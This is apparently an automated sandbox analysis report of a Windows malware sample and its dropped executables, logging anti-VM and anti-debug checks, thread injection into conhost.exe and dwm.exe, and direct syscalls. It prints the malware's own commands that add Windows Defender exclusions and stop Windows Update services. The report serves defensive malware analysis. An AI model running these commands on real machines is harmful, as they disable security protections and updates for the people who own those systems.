Source: C:\Users\user\AppData\Local\Temp\236013504.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\236013504.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\236013504.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040D770	5_2_0040D770
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_0040D770	6_2_0040D770
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040D770	19_2_0040D770

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\sysppvrdnvs.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_19-4451
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep	graph_5-4451
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_5-4451
Source: C:\Windows\sysppvrdnvs.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess	graph_19-4451

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\dwm.exe

System information queried: FirmwareTableInformation

Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Memory allocated: B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Memory allocated: 1B4C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Memory allocated: BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Memory allocated: 1B190000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\sysppvrdnvs.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\sysppvrdnvs.exe	Window / User API: threadDelayed 962	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7530	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2127	Jump to behavior
Source: C:\Users\user\sysppvrdnvs.exe	Window / User API: threadDelayed 631
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7652
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1917
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5575
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4174
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7095
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7035
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2496

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp			Jump to dropped file
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Evaded block: after key decision	graph_5-4467
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Evaded block: after key decision	graph_5-4453
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Evaded block: after key decision	graph_5-4535
Source: C:\Windows\sysppvrdnvs.exe	Evaded block: after key decision	graph_19-4451

Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\sysppvrdnvs.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep	graph_6-5878
Source: C:\Windows\sysppvrdnvs.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_6-4498
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_5-4474
Source: C:\Users\user\AppData\Local\Temp\236013504.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep	graph_5-5407

Source: C:\Users\user\Desktop\T52Z708x2p.exe	API coverage: 6.2 %
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	API coverage: 3.7 %
Source: C:\Windows\sysppvrdnvs.exe	API coverage: 0.9 %

Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040D770		19_2_0040D770
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040D770		5_2_0040D770

Source: C:\Windows\sysppvrdnvs.exe TID: 7616	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe TID: 7616	Thread sleep count: 962 > 30	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe TID: 1660	Thread sleep count: 322 > 30	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe TID: 3380	Thread sleep time: -131150s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 7530 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep count: 2127 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7960	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe TID: 4296	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\sysppvrdnvs.exe TID: 7324	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\sysppvrdnvs.exe TID: 7324	Thread sleep count: 631 > 30
Source: C:\Users\user\sysppvrdnvs.exe TID: 7788	Thread sleep count: 228 > 30
Source: C:\Users\user\sysppvrdnvs.exe TID: 7568	Thread sleep time: -62295s >= -30000s
Source: C:\Users\user\sysppvrdnvs.exe TID: 7568	Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6164	Thread sleep count: 7652 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6112	Thread sleep count: 1917 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 5575 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 4174 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 484	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\193938922.exe TID: 348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044	Thread sleep count: 7095 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044	Thread sleep count: 2468 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6340	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540	Thread sleep count: 7035 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180	Thread sleep count: 2496 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456	Thread sleep time: -3689348814741908s >= -30000s

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\sysppvrdnvs.exe	Last function: Thread delayed
Source: C:\Users\user\sysppvrdnvs.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140073710 FindFirstFileExW,	1_2_0000000140073710
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140028D50 FindNextFileW,FindClose,FindFirstFileExW,GetFileAttributesW,PathMatchSpecW,	1_2_0000000140028D50
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	5_2_004068E0
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_004067A0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	6_2_004068E0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	6_2_004067A0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	19_2_004068E0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	19_2_004067A0

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Code function: 1_2_00000001400550DC VirtualQuery,GetSystemInfo,

1_2_00000001400550DC

Source: C:\Windows\sysppvrdnvs.exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Thread delayed: delay time: 131150	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\sysppvrdnvs.exe	Thread delayed: delay time: 40000
Source: C:\Users\user\sysppvrdnvs.exe	Thread delayed: delay time: 62295
Source: C:\Users\user\sysppvrdnvs.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 70AF.exe, 00000004.00000002.1497197791.000000000095A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWQo
Source: T52Z708x2p.exe, 00000001.00000002.1398120886.0000000000434000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: T52Z708x2p.exe, 00000001.00000003.1397284019.000000000049E000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398120886.0000000000434000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398181396.000000000049E000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000002.1497197791.000000000095A000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000002.1497197791.000000000092A000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000003.1609744696.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000003.1804997304.00000000005A2000.00000004.00000020.00020000.00000000.sdmp, 1332331323.exe, 0000001D.00000002.1982106656.00000000015BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: 1332331323.exe, 0000001D.00000002.1982106656.0000000001618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6\|

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	API call chain: ExitProcess graph end node	graph_5-4452
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	API call chain: ExitProcess graph end node	graph_5-4464
Source: C:\Windows\sysppvrdnvs.exe	API call chain: ExitProcess graph end node	graph_19-4495
Source: C:\Windows\sysppvrdnvs.exe	API call chain: ExitProcess graph end node	graph_19-4464

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Code function: 1_2_00000001400544DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00000001400544DC

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

Code function: 5_2_0040A890 GetProcessHeaps,

5_2_0040A890

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400544CC SetUnhandledExceptionFilter,	1_2_00000001400544CC
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400544DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00000001400544DC
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_00000001400535D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00000001400535D8
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_000000014005CAB8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_000000014005CAB8
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Code function: 4_2_00AF1B68 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	4_2_00AF1B68
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	Code function: 27_2_00E81958 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	27_2_00E81958
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Code function: 29_2_00951C08 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	29_2_00951C08
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	Code function: 32_2_007A18A8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	32_2_007A18A8
Source: C:\Users\user\AppData\Local\Temp\236013504.exe	Code function: 62_2_00F41958 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	62_2_00F41958
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F01180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	63_2_00007FF6B6F01180
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F16731 SetUnhandledExceptionFilter,	63_2_00007FF6B6F16731
Source: C:\Windows\System32\conhost.exe	Code function: 63_2_00007FF6B6F2531C SetUnhandledExceptionFilter,_wcsnicmp,	63_2_00007FF6B6F2531C
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Code function: 67_2_00E31C08 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	67_2_00E31C08

Source: C:\Users\user\AppData\Local\Temp\158238779.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"	Jump to behavior
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	NtQuerySystemInformation: Direct from: 0x7FF6E1E55B0E
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	NtQuerySystemInformation: Direct from: 0x7FF75CFC5B0E

Maps a DLL or memory area into another process

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Thread register set: target process: 5064
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Thread register set: target process: 3960

Writes to foreign memory regions

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Memory written: C:\Windows\System32\conhost.exe base: D3D1735010
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Memory written: C:\Windows\System32\dwm.exe base: 7DBB4CE010

Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"	Jump to behavior
Source: C:\Windows\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Users\user\sysppvrdnvs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
